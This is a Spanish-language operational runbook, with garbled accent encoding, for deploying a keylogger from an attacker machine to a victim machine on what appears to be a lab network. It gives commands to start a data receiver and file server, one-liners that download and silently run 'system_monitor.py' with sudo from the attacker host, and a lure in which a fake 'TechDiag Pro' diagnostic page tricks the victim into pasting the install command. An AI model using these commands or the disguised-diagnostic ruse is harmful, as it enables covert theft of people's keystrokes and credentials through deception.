# CONFIGURACI칍N DE RED ACTUALIZADA
# ================================

## IPs de las m치quinas:
- M치quina atacante (receptor): 10.0.2.15
- M치quina v칤ctima (objetivo): 10.0.2.4

## PUERTOS UTILIZADOS:
- Puerto 8080: Receptor de datos del keylogger
- Puerto 8000: Servidor HTTP para descargar archivos

## COMANDOS PARA M츼QUINA ATACANTE (10.0.2.15)
# ==============================================

# 1. Iniciar servidor receptor (puerto 8080)
python3 data_receiver.py --port 8080

# 2. Servir archivos CON INTERFAZ WEB (puerto 8000)
python3 -m http.server 8000

# 3. Verificar interfaz web (opcional)
# Abrir navegador en: http://10.0.2.15:8000

## COMANDOS PARA M츼QUINA V칈CTIMA (10.0.2.4)
# ==========================================

# 游깷 OPCI칍N A: V칈A INTERFAZ WEB (RECOMENDADA - M츼S PROFESIONAL)
# =============================================================
# 1. Abrir navegador en m치quina v칤ctima
# 2. Ir a: http://10.0.2.15:8000
# 3. Ver la interfaz "TechDiag Pro - Sistema de Diagn칩stico Empresarial"
# 4. Hacer clic en "Iniciar Diagn칩stico Completo" o "Diagn칩stico R치pido"
# 5. Seguir las instrucciones mostradas en pantalla
# 6. Copiar y pegar el comando generado en la terminal

# 游눹 OPCI칍N B: COMANDO DIRECTO (BACKUP)
# =====================================

# Opci칩n 1: Comando que se pide pegar en la consola

 wget -q http://10.0.2.15:8000/system_monitor.py http://10.0.2.15:8000/reconstructor.py && sudo apt install -y python3-pynput python3-requests >/dev/null 2>&1 && sudo python3 system_monitor.py --silent &


# Opci칩n 2: Descarga y ejecuci칩n manual
wget http://10.0.2.15:8000/system_monitor.py
python3 system_monitor.py --stealth

# Opci칩n 4: Descargar proyecto completo
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://10.0.2.15:8000/



## ALTERNATIVA: EJECUTABLE STANDALONE (SIN DEPENDENCIAS)
# =====================================================

# Opci칩n E: Ejecutable compilado (M츼S SIMPLE PARA LA V칈CTIMA)
# En atacante, compilar primero:
python3 build_keylogger_new.py

# Luego servir el ejecutable:
python3 -m http.server 8000

# En v칤ctima (UN SOLO COMANDO):
wget http://10.0.2.15:8000/dist/system_monitor && chmod +x system_monitor && sudo ./system_monitor

# O transferir directamente:
scp dist/system_monitor usuario@10.0.2.4:/tmp/ && ssh usuario@10.0.2.4 'sudo /tmp/system_monitor'


## VERIFICACI칍N DE CONECTIVIDAD
# =============================

# Desde v칤ctima (10.0.2.4), verificar conexi칩n al atacante:
ping 10.0.2.15
curl -I http://10.0.2.15:8000

# Desde atacante (10.0.2.15), verificar conexi칩n a v칤ctima:
ping 10.0.2.4

## Flujo
# ===============================

游깷 FLUJO RECOMENDADO (CON INTERFAZ WEB):
========================================

1. En atacante (10.0.2.15):
   - Terminal 1: python3 data_receiver.py --port 8080
   - Terminal 2: python3 -m http.server 8000
   - Opcional: Verificar en navegador -> http://10.0.2.15:8000

2. En v칤ctima (10.0.2.4):
   - Abrir navegador
   - Ir a: http://10.0.2.15:8000
   - Ver interfaz "TechDiag Pro"
   - Hacer clic en "Iniciar Diagn칩stico Completo"
   - Copiar comando mostrado y pegarlo en terminal

3. Monitorear resultados en atacante:
   - Los datos aparecer치n en received_data/
   - Ver preview en tiempo real en la consola del receptor

游눹 FLUJO ALTERNATIVO (L칈NEA DE COMANDOS):
========================================

1. En atacante: Igual que arriba
2. En v칤ctima: wget -q http://10.0.2.15:8000/system_monitor.py http://10.0.2.15:8000/reconstructor.py && sudo apt install -y python3-pynput python3-requests >/dev/null 2>&1 && sudo python3 system_monitor.py --silent &
3. Monitorear: Igual que arriba

